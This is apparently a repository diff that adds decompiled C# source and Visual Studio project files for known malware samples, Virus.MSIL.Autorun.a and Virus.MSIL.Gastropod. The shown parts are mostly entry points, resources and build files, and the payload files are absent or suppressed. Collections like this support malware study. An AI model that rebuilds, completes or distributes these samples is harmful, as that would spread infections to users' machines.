public class LibWrapDateTime
{
[DllImport("Kernel32.dll")]
public static extern void GetLocalTime(Form1.SystemTime st);
[DllImport("Kernel32.dll")]
public static extern void SetLocalTime(Form1.SystemTime st);
}
[StructLayout(LayoutKind.Sequential)]
public class SystemTime
{
public ushort wYear;
}
}
}
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Form1.resx
+123
View File
@@ -0,0 +1,123 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.Icon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>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</value>
</data>
</root>
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Program.cs
+22
View File
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: redice.Program
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System;
using System.Windows.Forms;
namespace redice
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: redice.Properties.Resources
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace redice.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (redice.Properties.Resources.resourceMan == null)
redice.Properties.Resources.resourceMan = new ResourceManager("redice.Properties.Resources", typeof (redice.Properties.Resources).Assembly);
return redice.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => redice.Properties.Resources.resourceCulture;
set => redice.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Properties/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: redice.Properties.Settings
// Assembly: redice, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A08BD253-D698-4C81-8053-905E15E13E56
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace redice.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Virus.MSIL.Autorun.a.csproj
+50
View File
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>redice</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>redice</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Form1.cs" />
<Compile Include="ExecRegedit.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/A/Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265/Virus.MSIL.Autorun.a.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "redice", "Virus.MSIL.Autorun.a-6d6e91addfd09cee507606780796c379a8ff3d75a3229977e98132df6a9e6265.csproj", "{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6A729B30-F670-4E6F-95FC-EB2E86BB75AA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e/MainApp.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: MainApp
// Assembly: sna, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 85B9BA0A-84D0-4A00-94C1-CE02B81D71C1
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e.exe
using kckelhvxlr;
using System.Threading;
internal class MainApp
{
public static void Main()
{
Thread thread = new Thread(new ThreadStart(xrieopydqqcD.Go));
thread.Start();
Thread.Sleep(30000);
thread.Abort();
}
}
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e/Virus.MSIL.Gastropod.csproj
+37
View File
@@ -0,0 +1,37 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{C2F1D96B-D869-4BDB-B883-67681B31397E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>sna</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="MainApp.cs" />
<Compile Include="kckelhvxlr\xrieopydqqcD.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e/Virus.MSIL.Gastropod.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sna", "Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e.csproj", "{C2F1D96B-D869-4BDB-B883-67681B31397E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{C2F1D96B-D869-4BDB-B883-67681B31397E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-1b8f5086ac6be43f51a9c9e90d8400df1c0e436d1a6bae9f559ecbaa7fa3619e/kckelhvxlr/xrieopydqqcD.cs
+1693
View File
File diff suppressed because it is too large Load Diff
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e/MainApp.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: MainApp
// Assembly: sna, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: B33CF1F9-9697-4137-81AE-C49BE0C90EB5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e.exe
using System.Threading;
using zwuUkpmiAMoxhf;
internal class MainApp
{
public static void Main()
{
Thread thread = new Thread(new ThreadStart(lapixb.Go));
thread.Start();
Thread.Sleep(100000);
thread.Abort();
}
}
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e/Virus.MSIL.Gastropod.csproj
+37
View File
@@ -0,0 +1,37 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>sna</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="MainApp.cs" />
<Compile Include="zwuUkpmiAMoxhf\lapixb.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Virus/MSIL/G/Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e/Virus.MSIL.Gastropod.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sna", "Virus.MSIL.Gastropod-3da647492dbf464bd7c6ca18c70e0a510e03dd25b149786cd96bf8c8dbcaa29e.csproj", "{17EC3B78-A178-42F5-B9C7-DDE7ADB60015}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
